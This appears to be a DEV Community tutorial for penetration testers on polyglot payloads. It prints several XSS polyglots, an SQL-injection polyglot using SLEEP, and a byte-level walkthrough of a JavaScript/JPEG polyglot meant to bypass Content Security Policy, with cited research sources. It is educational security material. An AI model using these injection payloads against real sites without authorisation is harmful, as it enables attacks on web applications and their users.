DEV Community

Cover image for What are polyglots and how to use them as a pentester
Grzegorz Piechnik
Grzegorz Piechnik

Posted on • Edited on

What are polyglots and how to use them as a pentester

It would take days if not weeks of work to cover all possible vulnerability scenarios with (for example) XSS with known paylodes. This is evidenced, for example, by the size of the potential vectors of attacks provided by PortSwigger. Polyglots are something of a "universal" payload consisting of several others. Note, however, that polyglots are often ineffective when working with systems that use WAF. This is because a system with properly prepared signatures will not allow our request to reach the destination.

Analysis of polyglots

To better understand the construction of polyglots, let's analyze one of them.

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Enter fullscreen mode Exit fullscreen mode

To begin with, let's break polyglot into its first parts.

  • jaVasCript: - label in ECMAScript; otherwise URI scheme.
  • /*-/*/*/'/"/**/` - a polyline comment in ECMAScript; a sequence of breaking literals.
  • (/* */oNcliCk=alert() ) - execution zone wrapped in calling brackets,
  • //%0D%0A%0d%0a// - single-line comment in ECMAScript; double CRLF in HTTP response headers,
  • </stYle/</titLe/</teXtarEa/</scRipt/--!> - a sequence that breaks HTML tags,
  • x3csVg/x3e` - svg element.

Some other interesting examples of polyglots are below.

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//> 
Enter fullscreen mode Exit fullscreen mode
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/&lt;i<frame */ onload=alert()//</script> 
Enter fullscreen mode Exit fullscreen mode
 javascript:alert()//'/*`/*"/**/;alert()//%0D%0A-->'>"></title></textarea></style></noscript></noembed></template></select>&lt;svg/oNloAd=alert()&gt;<FRAME onload=alert()></script>\";alert()//<svg/oNloAd=alert()> 
Enter fullscreen mode Exit fullscreen mode

SQLi polyglots (SQL injection).

Similar to Javascript code, we can create polyglots using the SQLL query language. As an example, consider code proposed by security researcher Mathias Karlsson.

SLEEP(1) /*’ or SLEEP(1) or’” or SLEEP(1) or “*/
Enter fullscreen mode Exit fullscreen mode

Javascript/JPEG polyglots

So far we have analyzed XSS polyglots and those related to the SQL query language. However, it is possible to create polyglots directly related to both Javascript language and JPEG format. Ultimately, this would help bypass Content Security Policy on pages that use user-submitted images. The challenge of creating such a polyglot was taken up by researcher Gareth Heyes, and he describes the entire process in a shared article.

In short, creating a polyglot involved constructing a file that would be both a valid JPEG and Javascript file. This is possible because the two formats are not mutually exclusive.

The first step to create a universal file was to set the first two bytes as a Javascript variable (0xFF 0xD8 0xFF 0xE0). The next two bytes of the header (0x2F 0x2A) determine its length. Later there is a multi-line Javascript comment along with the 0x2F 0x2F2A completion zeros.

FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 00 48 00 48 00 00 00 00 00 00 00 00 00 00....
Enter fullscreen mode Exit fullscreen mode

We start the JPEG comment with two bytes (0xFF 0xFE) and specify its length (0x99 0x1C). The next lines of code are the Javascript comment along with the payload (*/=alert("Burp rocks.")/*).

FF FE 00 1C 2A 2F 3D 61 6C 65 72 74 28 22 42 75 72 70 20 72 6F 63 6B 73 2E 22 29 3B 2F 2A
Enter fullscreen mode Exit fullscreen mode

Then we need to close the JavaScript comment. In the described case, the last four bytes of the image were edited. Here is what the end of the file looks like:

2A 2F 2F 2F FF D9

The output of the standard file and hd -C commands can help us understand the above logic.

──$ file xss.jpg
xss.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 12074, comment: "*/=alert("Burp rocks.");/*", baseline, precision 8, 450x68, components 3
Enter fullscreen mode Exit fullscreen mode
──$ hd -C xss.jpg 
00000000  ff d8 ff e0 2f 2a 4a 46  49 46 00 01 01 01 00 48  |..../*JFIF.....H|
00000000  ff d8 ff e0 2f 2a 4a 46  49 46 00 01 01 01 00 48  |..../*JFIF.....H|
00000010  00 48 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |.H..............|
00000010  00 48 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |.H..............|
00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00000020  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00002f20  00 00 00 00 00 00 00 00  00 00 00 00 00 00 ff fe  |................|
00002f20  00 00 00 00 00 00 00 00  00 00 00 00 00 00 ff fe  |................|
00002f30  00 1c 2a 2f 3d 61 6c 65  72 74 28 22 42 75 72 70  |..*/=alert("Burp|
00002f30  00 1c 2a 2f 3d 61 6c 65  72 74 28 22 42 75 72 70  |..*/=alert("Burp|
00002f40  20 72 6f 63 6b 73 2e 22  29 3b 2f 2a ff db 00 43  | rocks.");/*...C|
00002f40  20 72 6f 63 6b 73 2e 22  29 3b 2f 2a ff db 00 43  | rocks.");/*...C|
00002f50  00 03 02 02 03 02 02 03  03 03 03 04 03 03 04 05  |................|
00002f50  00 03 02 02 03 02 02 03  03 03 03 04 03 03 04 05  |................|
00002f60  08 05 05 04 04 05 0a 07  07 06 08 0c 0a 0c 0c 0b  |................|
00002f60  08 05 05 04 04 05 0a 07  07 06 08 0c 0a 0c 0c 0b  |................|
Enter fullscreen mode Exit fullscreen mode

Polyglot innerht

Polyglot innerht is a site where users can submit their own polyglots. Some of them hold up to 20 contexts.

Sources

https://web.archive.org/web/20190617111911/https://polyglot.innerht.ml/
https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
https://portswigger.net/research/bypassing-csp-using-polyglot-jpegs
https://dev.to/caffiendkitten/xss-javascript-polyglots-4i64
https://www.slideshare.net/MathiasKarlsson2/polyglot-payloads-in-practice-by-avlidienbrunn-at-hackpra

Top comments (0)